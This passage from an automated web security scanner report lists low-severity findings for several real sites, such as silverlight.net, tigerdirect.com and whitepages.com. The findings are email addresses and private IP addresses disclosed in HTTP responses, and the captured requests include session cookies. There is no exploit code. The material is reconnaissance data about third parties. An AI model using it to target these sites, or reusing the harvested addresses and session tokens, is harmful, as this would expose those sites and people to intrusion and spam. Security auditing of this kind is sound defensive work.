Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:19:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<a href="http://forums.silverlight.net/members/bud_4000_dotnetchecks.com.aspx" title="bud@dotnetchecks.com" class="online">
...[SNIP]...
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319865000000000&cdn_id=12152010" alt="bud@dotnetchecks.com" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/bud@dotnetchecks.com.jpg?forceidenticon=False&dt=634319865000000000&cdn_id=12152010');" />
...[SNIP]...

26.150. http://www.silverlight.net/privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /privacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19103
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Privacy St
...[SNIP]...
<a href="mailto:mc_feedback_silverlightnet@neudesic.com">mc_feedback_silverlightnet@neudesic.com </a>
...[SNIP]...

26.151. http://www.silverlight.net/resources/script/omniture/s_code_dotnet.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /resources/script/omniture/s_code_dotnet.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/script/omniture/s_code_dotnet.min.js HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 26 Jan 2011 22:07:17 GMT
Accept-Ranges: bytes
ETag: "4f6f7a65a5bdcb1:0",""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 22031

function omniGetCookie(b){var d=document.cookie.indexOf(b+"=");if(d!=-1){var c=d+b.length+1;var a=document.cookie.indexOf(";",c);if(a==-1){a=document.cookie.length}return unescape(document.cookie.subs
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.152. http://www.silverlight.net/termsofuse.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /termsofuse.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /termsofuse.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49831
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Terms Of U
...[SNIP]...
<a href="mailto:homepage@microsoft.com" mce_href="mailto:homepage@microsoft.com">homepage@microsoft.com</a>
...[SNIP]...
<a href="mailto:webmaster@redacted" mce_href="mailto:webmaster@redacted">webmaster@redacted</a>
...[SNIP]...
<a href="mailto:support@hotmail.com" mce_href="mailto:support@hotmail.com">support@hotmail.com</a>
...[SNIP]...
<a href="mailto:abuse@hotmail.com" mce_href="mailto:abuse@hotmail.com">abuse@hotmail.com</a> or <a href="mailto:hotmailprivacy@hotmail.com" mce_href="mailto:hotmailprivacy@hotmail.com">hotmailprivacy@hotmail.com</a>
...[SNIP]...
<a href="mailto:piracy@microsoft.com" mce_href="mailto:piracy@microsoft.com">piracy@microsoft.com</a>
...[SNIP]...

26.153. http://www.spacedaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacedaily.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:40 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html
Content-Length: 78931

<HTML><HEAD><TITLE>Space News From SpaceDaily.Com</TITLE>
<META NAME="description" CONTENT="Space News from SpaceDaily.Com brings the space industry professional daily news from the frontier, with con
...[SNIP]...
<a href="mailto:info@spacemedianetwork.com?subject=Editorial Enquiries">
...[SNIP]...
<a href="mailto:info@spacemedianetwork.com?subject=Editorial Enquiries">
...[SNIP]...

26.154. http://www.spacepolitics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacepolitics.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.spacepolitics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:09 GMT
Server: Apache
X-Pingback: http://www.spacepolitics.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="mailto:jeff@spacepolitics.com">
...[SNIP]...

26.155. http://www.thecaseforpluto.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thecaseforpluto.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.thecaseforpluto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 07:17:09 GMT
Accept-Ranges: bytes
ETag: "4aa612e15fbccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:19:26 GMT
Connection: close
Content-Length: 5067

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>The Case for Pluto</title>
<meta name="description" content="&quot;The Case for Pluto&quot; explor
...[SNIP]...
<a href="mailto:alan@thecaseforpluto.com">
...[SNIP]...

26.156. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
er your e-mail address in the Box');
fld.focus();
return false;
} else if (filter.test(fld.value) == false) {
alert('Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com');
fld.focus();
return false;
} else {
return true;
}
}


function get_random()
{
var ranNum= Math.floor(Math.random()*4);
   return ranNum;
}


function getaQuot
...[SNIP]...
ument.ccExForm.email;
       var at="@"
       var dot="."
       var lat=str.indexOf(at)
       var lstr=str.length
       var ldot=str.indexOf(dot)
       alertxr = "Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com"
   
       if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
        alert(alertxr);
           lightbox("open");
           emailID.focus();
        return false
       }

        if (str.indexOf(at,(
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...

26.157. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/1999/REC-html401-19991224/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TR/1999/REC-html401-19991224/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:25:54 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=31536000
Expires: Sun, 29 Jan 2012 23:25:54 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

26.158. http://www.w3.org/TR/html4/strict.dtd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3.org
Path:   /TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:40:26 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Fri, 29 Apr 2011 23:40:26 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

27. Private IP addresses disclosed
There are 81 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


27.1. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:41 GMT
X-DirectServer: whitepg_DS1
Content-Type: application/x-javascript
Content-Length: 12856
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00058525BF050D44401A5E1461626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE1=+6jd3r4Ya10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE2=+6jd3raZf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

27.2. http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:05:38 GMT
X-DirectServer: whitepg_DS0
Content-Type: application/x-javascript
Content-Length: 7034
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: LE3=+6jd3r4Wa10014+9qUEKJKI6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<script language=\"JavaScript\" type=\"text/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write(\'<script language=\"JavaScript\" type=\"text/javascript\"\');\r\nd.writ
...[SNIP]...

27.3. http://atl.whitepages.com/IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /IMPCNT/ccid=58230/AAMSZ=top_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:43 GMT
X-DirectServer: whitepg_DS1
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.4. http://atl.whitepages.com/IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /IMPCNT/ccid=58255/AAMSZ=landscape_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607; __qca=P0-1307497695-1296350983104; Sample=18

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:30:06 GMT
X-DirectServer: whitepg_DS4
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.5. http://atl.whitepages.com/IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /IMPCNT/ccid=58284/AAMSZ=bottom_rail/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:45 GMT
X-DirectServer: whitepg_DS0
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.6. http://atl.whitepages.com/IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /IMPCNT/ccid=60680/AAMSZ=med_rect/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=00058525BF050D44401A5E1461626364; LE1=+6jd3r4Ya10014+4; LE2=+6jd3raZf10014+4; LE3=+6jd3r4Wa10014+4; LE4=+6jd3rKba10014+4; AA002=1294100002-3786607

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:43 GMT
X-DirectServer: whitepg_DS3
Content-Type: image/gif
Content-Length: 43
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

GIF89a.............!.......,...........D..;

27.7. http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
